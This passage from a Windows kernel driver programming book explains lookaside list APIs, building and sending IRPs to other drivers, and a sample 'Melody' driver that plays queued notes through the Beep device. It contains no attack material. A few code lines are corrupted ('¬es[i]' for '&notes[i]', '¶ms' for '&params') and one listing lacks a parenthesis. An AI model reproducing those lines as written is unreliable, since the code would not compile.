remember to call delete in the driver’s unload routine.
Another variant of the delete operator the compiler might insist on if you set the compiler
conformance to C++17 or newer is the following:
void __cdecl operator delete(void* p, size_t, std::align_val_t) {
ExFreePool(p);
}
You can look up the meaning of std::align_val_t in a C++ reference, but it does not matter
for our purposes.
Lookaside Lists
The dynamic memory allocation functions discussed so far (the ExAllocatePool* family of APIs) are
generic in nature, and can accommodate allocations of any size. Internally, managing the pool is non-trivial:
various lists are needed to manage allocations and deallocations of different sizes. This management aspect
of the pools is not free.
One fairly common case that leaves room for optimizations is when fixed-sized allocations are needed.
When such allocation is freed, it’s possible to not really free it, but just mark it as available. The next
allocation request can be satisfied by the existing block, which is much faster to do than allocating a fresh
block. This is exactly the purpose of lookaside lists.
There are two APIs to use for working with lookaside lists. The original one, available from Windows 2000,
and a newer available from Vista. I’ll describe both, as they are quite similar.
The “Classic” Lookaside API
The first thing to do is to initialize the data structure manageing a lookaside list. Two functions are vailable,
which are essentailly the same, selcting the paged pool or non-paged pool where the allocations should be
coming from. Here is the paged pool version:
VOID ExInitializePagedLookasideList (
_Out_ PPAGED_LOOKASIDE_LIST Lookaside,
_In_opt_ PALLOCATE_FUNCTION Allocate,
_In_opt_ PFREE_FUNCTION Free,
_In_ ULONG Flags,
_In_ SIZE_T Size,
_In_ ULONG Tag,
_In_ USHORT Depth);
Chapter 8: Advanced Programming Techniques (Part 1)
234
The non-paged variant is practically the same, with the function name being ExInitializeNPaged-
LookasideList.
The first parameter is the resulting initialized structure. Although, the structure layout is described in
wdm.h (with a macro named GENERAL_LOOKASIDE_LAYOUT to accommodate multiple uses that can’t
be shared in other ways using the C language), you should treat this structure as opaque.
The Allocate parameter is an optional allocation function that is called by the lookaside implementation
when a new allocation is required. If specified, the allocation function must have the following prototype:
PVOID AllocationFunction (
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag);
The allocation function receives the same parameters as ExAllocatePoolWithTag. In fact, if the
allocation function is not specified, this is the call made by the lookaside list manager. If you don’t
require any other code, just specify NULL. A custom allocation function could be useful for debugging
purposes, for example. Another possibility is to call ExAllocatePoolWithTagPriority instead of
ExAllocatePoolWithTag, if that makes sense for your driver.
If you do provide an allocation function, you might need to provide a de-allocation function in the Free
parameter. If not specified, the lookaside list manager calls ExFreePool. Here is the expected prototype
for this function:
VOID FreeFunction (
_In_ __drv_freesMem(Mem) PVOID Buffer);
The next parameter, Flags can be zero or POOL_RAISE_IF_ALLOCATION_FAILURE (Windows 8 and
later) that indicates an exception should be raised (STATUS_INSUFFICIENT_RESOURCE) if an allocation
fails, instead of returning NULL to the caller.
The Size parameter is the size of chunks managed by the lookaside list. Usually, you would specify it as
sizeof some structure you want to manage. Tag is the tag to use for allocations. Finally, the last parameter,
Depth, indicates the number of allocations to keep in a cache. The documentation indicates this parameter
is “reserved” and should be zero, which makes the lookaside list manager to choose something appropriate.
Regardless of the number, the “depth” is adjusted based on the allocation patterns used with the lookaside
list.
Once a lookaside list is initialized, you can request a memory block (of the size specified in the initialization
function, of course) by calling ExAllocateFromPagedLookasideList:
PVOID ExAllocateFromPagedLookasideList (
_Inout_ PPAGED_LOOKASIDE_LIST Lookaside)
Nothing could be simpler - no special parameters are required, since everything else is already known. The
corresponding function for a non-paged pool lookaside list is ExAllocateFromNPagedLookasideList.
The opposite function used to free an allocation (or return it to the cache) is ExFreeToPaged-
LookasideList:
Chapter 8: Advanced Programming Techniques (Part 1)
235
VOID ExFreeToPagedLookasideList (
_Inout_ PPAGED_LOOKASIDE_LIST Lookaside,
_In_ __drv_freesMem(Mem) PVOID Entry)
The only value required is the pointer to free (or return to the cache). As you probably guess, the non-paged
pool variant is ExFreeToNPagedLookasideList.
Finally, when the lookaside list is no longer needed, it must be freed by calling ExDeletePaged-
LookasideList:
VOID ExDeletePagedLookasideList (
_Inout_ PPAGED_LOOKASIDE_LIST Lookaside);
One nice benefit of lookaside lists is that you don’t have to return all allocations to the list by repeatedly
calling ExFreeToPagedLookasideList before calling ExDeletePagedLookasideList; the latter
is enough, and will free all allocated blocks automatically. ExDeleteNPagedLookasideList is the
corresponding non-paged variant.
Write a C++ class wrapper for lookaside lists using the above APIs.
The Newer Lookaside API
The newer API provides two main benefits over the classic API:
• Uniform API for paged and non-paged blocks.
• The lookaside list structure itself is passed to the custom allocate and free functions (if provided),
that allows accessing driver data (example shown later).
Initializing a lookaside list is accomplished with ExInitializeLookasideListEx:
NTSTATUS ExInitializeLookasideListEx (
_Out_ PLOOKASIDE_LIST_EX Lookaside,
_In_opt_ PALLOCATE_FUNCTION_EX Allocate,
_In_opt_ PFREE_FUNCTION_EX Free,
_In_ POOL_TYPE PoolType,
_In_ ULONG Flags,
_In_ SIZE_T Size,
_In_ ULONG Tag,
_In_ USHORT Depth);
PLOOKASIDE_LIST_EX is the opaque data structure to initialize, which must be allocated from non-paged
memory, regardless of whether the lookaside list is to manage paged or non-paged memory.
The allocation and free functions are optional, just as they are with the classic API. These are their
prototypes:
Chapter 8: Advanced Programming Techniques (Part 1)
236
PVOID AllocationFunction (
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag,
_Inout_ PLOOKASIDE_LIST_EX Lookaside);
VOID FreeFunction (
_In_ __drv_freesMem(Mem) PVOID Buffer,
_Inout_ PLOOKASIDE_LIST_EX Lookaside);
Notice the lookaside list itself is a parameter. This could be used to access driver data that is part of a larger
structure containing the lookaside list. For example, suppose the driver has the following structure:
struct MyData {
ULONG SomeData;
LIST_ENTRY SomeHead;
LOOKASIDELIST_EX Lookaside;
};
The driver creates an instance of that structure (maybe globally, or on a per-client basis). Let’s assume it’s
created dynamically for every client creating a file object to talk to a device the driver manages:
// if new is overriden as described eariler in this chapter
MyData* pData = new (NonPagedPool) MyData;
// or with a standard allocation call
MyData* pData = (MyData*)ExAllocatePoolWithTag(NonPagedPool,
sizeof(MyData), DRIVER_TAG);
// initilaize the lookaside list
ExInitializeLookasideListEx(&pData->Lookaside, MyAlloc, MyFree, ...);
In the allocation and free functions, we can get a pointer to our MyData object that contains whatever
lookaside list is being used at the time:
PVOID MyAlloc(POOL_TYPE type, SIZE_T size, ULONG tag,
PLOOKASIDE_LIST_EX lookaside) {
MyData* data = CONTAINING_RECORD(lookaside, MyData, Lookaside);
// access members
//...
}
The usefulness of this technique is if you have multiple lookaside lists, each having their own “context”
data. Obviously, if you just have one such list stored globally, you can just access whatever global variables
you need.
Chapter 8: Advanced Programming Techniques (Part 1)
237
Continuing with ExInitializeLookasideListEx - PoolType is the pool type to use; this is where the
driver selects where allocations should be allocated from. Size, Tag and Depth have the same meaning as
they do in the classic API.
The Flags parameter can be zero, or one of the following:
• EX_LOOKASIDE_LIST_EX_FLAGS_RAISE_ON_FAIL - raise an exception instead of returning
NULL to the caller in case of an allocation failure.
• EX_LOOKASIDE_LIST_EX_FLAGS_FAIL_NO_RAISE - this flag can only be specified if a custom
allocation routine is specified, which causes the pool type provided to the allocation function to
be ORed with the POOL_QUOTA_FAIL_INSTEAD_OF_RAISE flag that causes a call to ExAl-
locationPoolWithQuotaTag to return NULL on quota limit violation instead of raising the
POOL_QUOTA_FAIL_INSTEAD_OF_RAISE exception. See the docs for more details.
The above flags are mutually exclusive.
Once the lookaside list is initialized, allocation and deallocation are done with the following APIs:
PVOID ExAllocateFromLookasideListEx (_Inout_ PLOOKASIDE_LIST_EX Lookaside);
VOID ExFreeToLookasideListEx (
_Inout_ PLOOKASIDE_LIST_EX Lookaside,
_In_ __drv_freesMem(Entry) PVOID Entry);
Of course, the terms “allocation” and “deallocation” are in the context of a lookaside list, meaning
allocations could be reused, and deallocations might return the block to the cache.
Finally, a lookaside list must be deleted with ExDeleteLookasideListEx:
VOID ExDeleteLookasideListEx (_Inout_ PLOOKASIDE_LIST_EX Lookaside);
Calling Other Drivers
One way to talk to other drivers is to be a “proper” client by calling ZwOpenFile or ZwCreateFile
in a similar manner to what a user-mode client does. Kernel callers have other options not available for
user-mode callers. One of the options is creating IRPs and sending them to a device object directly for
processing.
In most cases IRPs are created by one of the three managers, part of the Executive: I/O manager, Plug &
Play manager, and Power manager. In the cases we’ve seen so far, the I/O manager is the one creating
IRPs for create, close, read, write, and device I/O control request types. Drivers can create IRPs as well,
initialize them and then send them directly to another driver for processing. This could be more efficient
than opening a handle to the desired device, and then making calls using ZwReadFile, ZwWriteFile
Chapter 8: Advanced Programming Techniques (Part 1)
238
and similar APIs we’ll look at in more detail in a later chapter. In some cases, opening a handle to a device
might not even be an option, but obtaining a device object pointer might still be possible.
The kernel provides a generic API for building IRPs, starting with IoAllocateIrp. Using this API
requires the driver to register a completion routine so the IRP can be porperly freed. We’ll examine these
techniques in a later chapter (“Advanced Programming Techniques (Part 2)”). In this section, I’ll introduce
a simpler function to build a device I/O control IRP using IoBuildDeviceIoControlRequest:
PIRP IoBuildDeviceIoControlRequest(
_In_
ULONG IoControlCode,
_In_
PDEVICE_OBJECT DeviceObject,
_In_opt_
PVOID InputBuffer,
_In_
ULONG InputBufferLength,
_Out_opt_ PVOID OutputBuffer,
_In_
ULONG OutputBufferLength,
_In_
BOOLEAN InternalDeviceIoControl,
_In_opt_
PKEVENT Event,
_Out_
PIO_STATUS_BLOCK IoStatusBlock);
The API returns a proper IRP pointer on success, including filling in the first IO_STACK_LOCATION, or
NULL on failure. Some of the parameters to IoBuildDeviceIoControlRequest are the same provided
to the DeviceIoControl user-mode API (or to its kernel equivalent, ZwDeviceIoControlFile) -
IoControlCode, InputBuffer, InputBufferLength, OutputBuffer and OutputBufferLength.
The other parameters are the following:
• DeviceObject is the target device of this request. It’s needed so the API can allocate the correct
number of IO_STACK_LOCATION structures that accompany any IRP.
• InternalDeviceControl indicates whether the IRP should set its major function to IRP_MJ_INTER-
NAL_DEVICE_CONTROL (TRUE) or IRP_MJ_DEVICE_CONTROL (FALSE). This obviously depends
on the target device’s expectations.
• Event is an optional pointer to an event object that gets signaled when the IRP is completed by the
target device (or some other device the target may send the IRP to). An event is needed if the IRP
is sent for synchronous processing, so that the caller can wait on the event if the operation has not
yet completed. We’ll see a complete example in the next section.
• IoStatusBlock returns the final status of the IRP (status and information), so the caller can examine
it if it so wishes.
The call to IoBuildDeviceIoControlRequest just builds the IRP - it is not sent anywhere at this
point. To actually send the IRP to a device, call the generic IoCallDriver API:
NTSTATUS IoCallDriver(
_In_ PDEVICE_OBJECT DeviceObject,
_Inout_ PIRP Irp);
IoCallDriver advances the current I/O stack location to the next, and then invokes the target driver’s
major function dispatch routine. It returns whatever is returned from that dispatch routine. Here is a very
simplified implementation:
Chapter 8: Advanced Programming Techniques (Part 1)
239
NTSTATUS IoCallDriver(PDEVICE_OBJECT DeviceObject, PIRP Irp {
// update the current layer index
DeviceObject->CurrentLocation--;
auto irpSp = IoGetNextIrpStackLocation(Irp);
// make the next stack location the current one
Irp->Tail.Overlay.CurrentStackLocation = irpSp;
// update device object
irpSp->DeviceObject = DeviceObject;
return (DeviceObject->DriverObject->MajorFunction[irpSp->MajorFunction])
(DeviceObject, Irp);
}
The main question remaining is how to we get a pointer to a device object in the first place? One way is
by calling IoGetDeviceObjectPointer:
NTSTATUS IoGetDeviceObjectPointer(
_In_
PUNICODE_STRING ObjectName,
_In_
ACCESS_MASK DesiredAccess,
_Out_ PFILE_OBJECT *FileObject,
_Out_ PDEVICE_OBJECT *DeviceObject);
The ObjectName parameter is the fully-qualified name of the device object in the Object Manager’s
namespace (as can be viewed with the WinObj tool from Sysinternals). Desired access is usually
FILE_READ_DATA, FILE_WRITE_DATA or FILE_ALL_ACCESS. Two values are returned on success: the
device object pointer (in DeviceObject) and an open file object pointing to the device object (in FileObject).
The file object is not usually needed, but it should be kept around as a means of keeping the device object
referenced. When you’re done with the device object, call ObDereferenceObject on the file object
pointer to decrement the device object’s reference count indirectly. Alternatively, you can increment the
device object’s reference count (ObReferenceObject) and then decrement the file object’s reference
count so you don’t have to keep it around.
The next section demostrates usage of these APIs.
Putting it All Together: The Melody Driver
The Melody driver we’ll build in this section demonstrates many of the techniques shown in this chapter.
The melody driver allows playing sounds asynchronously (contrary to the Beep user-mode API that plays
sounds synchronously). A client application calls DeviceIoControl with a bunch of notes to play, and
the driver will play them as requested without blocking. Another sequence of notes can then be sent to
the driver, those notes queued to be played after the first sequence is finished.
Chapter 8: Advanced Programming Techniques (Part 1)
240
It’s possible to come up with a user-mode solution that would do essentially the same thing, but this can
only be easily done in the context of a single process. A driver, on the other hand, can accept calls from
multiple processes, having a “global” ordering of playback. In any case, the point is to demonstrate driver
programming techniques, rather than managing a sound playing scenario.
We’ll start by creating an empty WDM driver, as we’ve done in previous chapters, named KMelody. Then
we’ll add a file named MelodyPublic.h to serve as the common data to the driver and a user-mode client.
This is where we define what a note looks like and an I/O control code for communication:
// MelodyPublic.h
#pragma once
#define MELODY_SYMLINK L"\\??\\KMelody"
struct Note {
ULONG Frequency;
ULONG Duration;
ULONG Delay{ 0 };
ULONG Repeat{ 1 };
};
#define MELODY_DEVICE 0x8003
#define IOCTL_MELODY_PLAY \
CTL_CODE(MELODY_DEVICE, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
A note consists of a frequency (in Hertz) and duration to play. To make it a bit more interesting, a delay
and repeat count are added. If Repeat is greater than one, the sound is played Repeat times, with a delay
of Delay between repeats. Duration and Delay are provided in milliseconds.
The architecture we’ll go for in the driver is to have a thread created when the first client opens a handle
to our device, and that thread will perform the playback based on a queue of notes the driver manages.
The thread will be shut down when the driver unloads.
It may seem asymmetric at this point - why not create the thread when the driver loads? As we shall
see shortly, there is a little “snag” that we have to deal with that prevents creating the thread when the
driver loads.
Let’s start with DriverEntry. It needs to create a device object and a symbolic link. Here is the full
function:
Chapter 8: Advanced Programming Techniques (Part 1)
241
PlaybackState* g_State;
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(RegistryPath);
g_State = new (PagedPool) PlaybackState;
if (g_State == nullptr)
return STATUS_INSUFFICIENT_RESOURCES;
auto status = STATUS_SUCCESS;
PDEVICE_OBJECT DeviceObject = nullptr;
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\KMelody");
do {
UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\Device\\KMelody");
status = IoCreateDevice(DriverObject, 0, &name, FILE_DEVICE_UNKNOWN,
0, FALSE, &DeviceObject);
if (!NT_SUCCESS(status))
break;
status = IoCreateSymbolicLink(&symLink, &name);
if (!NT_SUCCESS(status))
break;
} while (false);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "Error (0x%08X)\n", status));
delete g_State;
if (DeviceObject)
IoDeleteDevice(DeviceObject);
return status;
}
DriverObject->DriverUnload = MelodyUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = MelodyCreateClose;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MelodyDeviceControl;
return status;
}
Most of the code should be familiar by now. The only new code is the creation of an object of type
Chapter 8: Advanced Programming Techniques (Part 1)
242
PlaybackState. The new C++ operator is overloaded as described earlier in this chapter. If allocating a
PlaybackState instance fails, DriverEntry returns STATUS_INSUFFICIENT_RESOURCES, report-
ing a failure to the kernel.
The PlaybackState class is going to manage the list of notes to play and most other functionality specific
to the driver. Here is its declaration (in PlaybackState.h):
struct PlaybackState {
PlaybackState();
~PlaybackState();
NTSTATUS AddNotes(const Note* notes, ULONG count);
NTSTATUS Start(PVOID IoObject);
void Stop();
private:
static void PlayMelody(PVOID context);
void PlayMelody();
LIST_ENTRY m_head;
FastMutex m_lock;
PAGED_LOOKASIDE_LIST m_lookaside;
KSEMAPHORE m_counter;
KEVENT m_stopEvent;
HANDLE m_hThread{ nullptr };
};
m_head is the head of the linked list holding the notes to play. Since multiple threads can access
this list, it must be protected with a synchronization object. In this case, we’ll go with a fast mutex.
FastMutex is a wrapper class similar to the one we saw in chapter 6, with the added twist that it’s
initialized in its constructor rather than a separate Init method. This is comvenient, and possible, because
PlaybackState is allocated dynamically, causing its constructor to be invoked, along with constructors
for data members (if any).
The note objects will be allocated from a lookaside list (m_lookaside), as each note has a fixed size, and
there is a strong likelihood of many notes coming and going. m_stopEvent is an event object that will
be used as a way to signal our playback thread to terminate. m_hThread is the playback thread handle.
Finally, m_counter is a sempahore that is going to be used in a somewhat counter-intuitive way, its
internal count indicating the number of notes in the queue.
As you can see, the event and semaphore don’t have wrapper classes, so we need to initialize them in the
PlaybackState constructor. Here is the constructor in full (in PlaybackState.cpp) with an addition of a
type that is going to hold a single node:
Chapter 8: Advanced Programming Techniques (Part 1)
243
struct FullNote : Note {
LIST_ENTRY Link;
};
PlaybackState::PlaybackState() {
InitializeListHead(&m_head);
KeInitializeSemaphore(&m_counter, 0, 1000);
KeInitializeEvent(&m_stopEvent, SynchronizationEvent, FALSE);
ExInitializePagedLookasideList(&m_lookaside, nullptr, nullptr, 0,
sizeof(FullNote), DRIVER_TAG, 0);
}
Here are the initialization steps taken by the constructor:
• Initialize the linked list to an empty list (InitializeListHead).
• Initialize the semaphore to a value of zero, meaning no notes are queued up at this point, with a
maximum of 1000 queued notes. Of course, this number is arbitrary.
• Initialize the stop event as a SynchronizationEvent type in the non-signaled state (KeInitializeEvent).
Technically, a NotificationEvent would have worked just as well, as just one thread will be
waiting on this event as we’ll see later.
• Initialize the lookaside list to managed paged pool allocations with size of sizeof(FullNote).
FullNote extends Note to include a LIST_ENTRY member, otherwise we can’t store such objects
in a linked list. The FullNote type should not be visible to user-mode, which is why it’s defined
provately in the driver’s source files only.
DRIVER_TAG and DRIVER_PREFIX are defined in the file KMelody.h.
Before the driver finally unloads, the PlaybackState object is going to be destroyed, invoking its
destructor:
PlaybackState::~PlaybackState() {
Stop();
ExDeletePagedLookasideList(&m_lookaside);
}
The call to Stop signals the playback thread to terminate as we’ll see shortly. The only other thing left to
do in terms of cleanup is to free the lookaside list.
The unload routine for the driver is similar to ones we’ve seen before with the addition of freeing the
PlaybackState object:
Chapter 8: Advanced Programming Techniques (Part 1)
244
void MelodyUnload(PDRIVER_OBJECT DriverObject) {
delete g_State;
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\KMelody");
IoDeleteSymbolicLink(&symLink);
IoDeleteDevice(DriverObject->DeviceObject);
}
The IRP_MJ_DEVICE_CONTROL handler is where notes provided by a client need to be added to the queue
of notes to play. The implementation is pretty straightforward because the heavy lifting is performed by
the PlaybackState::AddNotes method. Here is MelodyDeviceControl that validates the client’s
data and then invokes AddNotes:
NTSTATUS MelodyDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
auto& dic = irpSp->Parameters.DeviceIoControl;
auto status = STATUS_INVALID_DEVICE_REQUEST;
ULONG info = 0;
switch (dic.IoControlCode) {
case IOCTL_MELODY_PLAY:
if (dic.InputBufferLength == 0 ||
dic.InputBufferLength % sizeof(Note) != 0) {
status = STATUS_INVALID_BUFFER_SIZE;
break;
}
auto data = (Note*)Irp->AssociatedIrp.SystemBuffer;
if (data == nullptr) {
status = STATUS_INVALID_PARAMETER;
break;
}
status = g_State->AddNotes(data,
dic.InputBufferLength / sizeof(Note));
if (!NT_SUCCESS(status))
break;
info = dic.InputBufferLength;
break;
}
return CompleteRequest(Irp, status, info);
}
CompleteRequest is a helper that we’ve seen before that completes the IRP with the given status and
information:
Chapter 8: Advanced Programming Techniques (Part 1)
245
NTSTATUS CompleteRequest(PIRP Irp,
NTSTATUS status = STATUS_SUCCESS, ULONG_PTR info = 0);
//...
NTSTATUS CompleteRequest(PIRP Irp, NTSTATUS status, ULONG_PTR info) {
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = info;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
PlaybackState::AddNotes needs to iterate over the provided notes. Here is the beginning of the
function:
NTSTATUS PlaybackState::AddNotes(const Note* notes, ULONG count) {
KdPrint((DRIVER_PREFIX "State::AddNotes %u\n", count));
for (ULONG i = 0; i < count; i++) {
For each note, it needs to allocate a FullNote structure from the lookaside list:
auto fullNote = (FullNote*)ExAllocateFromPagedLookasideList(&m_lookaside);
if (fullNote == nullptr)
return STATUS_INSUFFICIENT_RESOURCES;
If succesful, the note data is copied to the FullNote and is added to the linked list under the protection
of the fast mutex:
//
// copy the data from the Note structure
//
memcpy(fullNote, ¬es[i], sizeof(Note));
//
// insert into the linked list
//
Locker locker(m_lock);
InsertTailList(&m_head, &fullNote->Link);
}
Locker<T> is the same type we looked at in chapter 6. The notes are inserted at the back of the list
with InsertTailList. This is where we must provide a pointer to a LIST_ENTRY object, which is why
FullNote objects are used instead of just Note. Finally, when the loop is completed, the semaphore must
be incremented by the number of notes to indicate there are more count more notes to play:
Chapter 8: Advanced Programming Techniques (Part 1)
246
//
// make the semaphore signaled (if it wasn't already) to
// indicate there are new note(s) to play
//
KeReleaseSemaphore(&m_counter, 2, count, FALSE);
KdPrint((DRIVER_PREFIX "Semaphore count: %u\n",
KeReadStateSemaphore(&m_counter)));
The value 2 used in KeReleaseSemaphore is the temporary priority boost a driver can provide to a
thread that is released because of the semaphore becoming signaled (the same thing happens with the
second parameter to IoCompleteRequest). I’ve chosen the value 2 arbitrarily. The value 0 (IO_NO_-
INCREMENT) is fine as well.
For debugging purposes, it may be useful to read the semaphore’s count with KeReadStateSemaphore
as was done in the above code. Here is the full function (without the comments):
NTSTATUS PlaybackState::AddNotes(const Note* notes, ULONG count) {
KdPrint((DRIVER_PREFIX "State::AddNotes %u\n", count));
for (ULONG i = 0; i < count; i++) {
auto fullNote =
(FullNote*)ExAllocateFromPagedLookasideList(&m_lookaside);
if (fullNote == nullptr)
return STATUS_INSUFFICIENT_RESOURCES;
memcpy(fullNote, ¬es[i], sizeof(Note));
Locker locker(m_lock);
InsertTailList(&m_head, &fullNote->Link);
}
KeReleaseSemaphore(&m_counter, 2, count, FALSE);
KdPrint((DRIVER_PREFIX "Semaphore count: %u\n",
KeReadStateSemaphore(&m_counter)));
return STATUS_SUCCESS;
}
The next part to look at is handling IRP_MJ_CREATE and IRP_MJ_CLOSE. In earlier chapters, we just
completed these IRPs successfully and that was it. This time, we need to create the playback thread when
the first client opens a handle to our device. The initialization in DriverEntry points both indices to
the same function, but the code is slightly different between the two. We could separate them to different
functions, but if the difference is not great we might decide to handle both within the same function.
For IRP_MJ_CLOSE, there is nothing to do but complete the IRP successfuly. For IRP_MJ_CREATE, we
want to start the playback thread the first time the dispatch routine is invoked. Here is the code:
Chapter 8: Advanced Programming Techniques (Part 1)
247
NTSTATUS MelodyCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
auto status = STATUS_SUCCESS;
if (IoGetCurrentIrpStackLocation(Irp)->MajorFunction == IRP_MJ_CREATE) {
//
// create the "playback" thread (if needed)
//
status = g_State->Start(DeviceObject);
}
return CompleteRequest(Irp, status);
}
The I/O stack location contains the IRP major function code we can use to make the distinction as required
here. In the Create case, we call PlaybackState::Start with the device object pointer that would be
used to keep the driver object alive as long as the thread is running. Let’s see what that method looks like.
NTSTATUS PlaybackState::Start(PVOID IoObject) {
Locker locker(m_lock);
if (m_hThread)
return STATUS_SUCCESS;
return IoCreateSystemThread(
IoObject,
// Driver or device object
&m_hThread,
// resulting handle
THREAD_ALL_ACCESS,
// access mask
nullptr,
// no object attributes required
NtCurrentProcess(),
// create in the current process
nullptr,
// returned client ID
PlayMelody,
// thread function
this);
// passed to thread function
}
Acuqiring the fast mutex ensures that a second thread is not created (as m_hThread would already be non-
NULL). The thread is created with IoCreateSystemThread, which is preferred over PsCreateSys-
temThread because it ensures that the driver is not unloaded while the thread is executing (this does
require Windows 8 or later).
The passed-in I/O object is the device object provided by the IRP_MJ_CREATE handler. The most common
way of creating a thread by a driver is to run it in the context of the System process, as it normally should
not be tied to a user-mode process. Our case, however, is more complicated because we intend to use the
Beep driver to play the notes. The Beep driver needs to be able to handle multiple users (that might be
connected to the same system), each one playing their own sounds. This is why when asked to play a note,
the Beep driver plays in the context of the caller’s session. If we create the thread in the System process,
which is always part of session zero, we will not hear any sound, because session 0 is not an interactive
user session.
Chapter 8: Advanced Programming Techniques (Part 1)
248
This means we need to create our thread in the context of some process running under the caller’s session
- Using the caller’s process directly (NtCurrentProcess) is the simplest way to get it working. You may
frown at this, and rightly so, because the first process calling the driver to play something is going to have
to host that thread for the lifetime of the driver. This has an unintended side effect: the process will not die.
Even if it may seem to terminate, it will still show up in Task Manager with our thread being the single
thread still keeping the process alive. We’ll find a more elegant solution later in this chapter.
Yet another consequence of this arrangement is that we only handle one session - the first one where one
of its processes happens to call the driver. We’ll fix that as well later on.
The thread created starts runniing the PlayMelody function - a static function in the PlaybackState
class. Callbacks must be global or static functions (because they are directly C function pointers), but in
this case we would like to access the members of this instance of PlaybackState. The common trick
is to pass the this pointer as the thread argument, and the callback simply invokes an instance method
using this pointer:
// static function
void PlaybackState::PlayMelody(PVOID context) {
((PlaybackState*)context)->PlayMelody();
}
Now the instance method PlaybackState::PlayMelody has full access to the object’s members.
There is another way to invoke the instance method without going through the intermediate
static by using C++ lambda functions, as non-capturing lambdas are directly convertible to C
function pointers:
IoCreateSystemThread(..., [](auto param) {
((PlaybackState*)param)->PlayMelody();
}, this);
The first order of business in the new thread is to obtain a pointer to the Beep device using IoGetDe-
viceObjectPointer:
#include <ntddbeep.h>
void PlaybackState::PlayMelody() {
PDEVICE_OBJECT beepDevice;
UNICODE_STRING beepDeviceName = RTL_CONSTANT_STRING(DD_BEEP_DEVICE_NAME_U);
PFILE_OBJECT beepFileObject;
auto status = IoGetDeviceObjectPointer(&beepDeviceName, GENERIC_WRITE,
&beepFileObject, &beepDevice);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "Failed to locate beep device (0x%X)\n",
Chapter 8: Advanced Programming Techniques (Part 1)
249
status));
return;
}
The Beep device name is \Device\Beep as we’ve seen in chapter 2. Conveniently, the provided header
ntddbeep.h declares everything we need in order to work with the device, such as the DD_BEEP_DEVICE_-
NAME_U macro that defines the Unicode name.
At this point, the thread should loop around while it has notes to play and has not been instructed to
terminate. This is where the semaphore and the event come in. The thread must wait until one of them is
signaled. If it’s the event, it should break out of the loop. If it’s the semaphore, it means the semaphore’s
count is greater than zero, which in turn means the list of notes is not empty:
PVOID objects[] = { &m_counter, &m_stopEvent };
IO_STATUS_BLOCK ioStatus;
BEEP_SET_PARAMETERS params;
for (;;) {
status = KeWaitForMultipleObjects(2, objects, WaitAny, Executive,
KernelMode, FALSE, nullptr, nullptr);
if (status == STATUS_WAIT_1) {
KdPrint((DRIVER_PREFIX "Stop event signaled. Exiting thread...\n"));
break;
}
KdPrint((DRIVER_PREFIX "Semaphore count: %u\n",
KeReadStateSemaphore(&m_counter)));
The required call is to KeWaitForMultipleObjects with the event and semaphore. They are put in an
array, since this is the requirement for KeWaitForMultipleObjects. If the returned status is STATUS_-
WAIT_1 (which is the same as STATUS_WAIT_0 + 1), meaning index number 1 is the signaled object,
the loop is exited with a break instruction.
Now we need to extract the next note to play:
PLIST_ENTRY link;
{
Locker locker(m_lock);
link = RemoveHeadList(&m_head);
NT_ASSERT(link != &m_head);
}
auto note = CONTAINING_RECORD(link, FullNote, Link);
KdPrint((DRIVER_PREFIX "Playing note Freq: %u Dur: %u Rep: %u Delay: %u\n",
note->Frequency, note->Duration, note->Repeat, note->Delay));
Chapter 8: Advanced Programming Techniques (Part 1)
250
We remove the head item from the list, and doing so under the fast mutex’ protection. The assert ensures
we are in a consistent state - remember that removing an item from an empty list returns the pointer to
its head.
The actual FullNote pointer is retrieved with the help of the CONTAINING_RECORD macro, that moves
the LIST_ENTRY pointer we received from RemoveHeadList to the containing FullNode that we are
actually interested in.
The next step is to handle the note. If the note’s frequency is zero, let’s consider that as a “silence time”
with the length provided by Delay:
if (note->Frequency == 0) {
//
// just do a delay
//
NT_ASSERT(note->Duration > 0);
LARGE_INTEGER interval;
interval.QuadPart = -10000LL * note->Duration;
KeDelayExecutionThread(KernelMode, FALSE, &interval);
}
KeDelayExecutionThread is the rough equivalent of the Sleep/SleepEx APIs from user-mode. Here
is its declaration:
NTSTATUS KeDelayExecutionThread (
_In_ KPROCESSOR_MODE WaitMode,
_In_ BOOLEAN Alertable,
_In_ PLARGE_INTEGER Interval);
We’ve seen all these parameters as part of the wait functions. The most common invocation is with
KernelMode and FALSE for WaitMode and Alertable, respectively. The interval is the most important
parameter, where negative values mean relative wait in 100nsec units. Converting from milliseconds
means multiplying by -10000, which is what you see in the above code.
If the frequency in the note is not zero, then we need to call the Beep driver with proper IRP.
We already know that we need the IOCTL_BEEP_SET control code (defined in ntddbeep.h) and the
BEEP_SET_PARAMETERS structure. All we need to do is build an IRP with the correct information using
IoBuildDeviceIoControlRequest, and send it to the beep device with IoCallDriver:
Chapter 8: Advanced Programming Techniques (Part 1)
251
else {
params.Duration = note->Duration;
params.Frequency = note->Frequency;
int count = max(1, note->Repeat);
KEVENT doneEvent;
KeInitializeEvent(&doneEvent, NotificationEvent, FALSE);
for (int i = 0; i < count; i++) {
auto irp = IoBuildDeviceIoControlRequest(IOCTL_BEEP_SET, beepDevice,
¶ms, sizeof(params),
nullptr, 0, FALSE, &doneEvent, &ioStatus);
if (!irp) {
KdPrint((DRIVER_PREFIX "Failed to allocate IRP\n"));
break;
}
status = IoCallDriver(beepDevice, irp);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "Beep device playback error (0x%X)\n",
status));
break;
}
if (status == STATUS_PENDING) {
KeWaitForSingleObject(&doneEvent, Executive, KernelMode,
FALSE, nullptr);
}
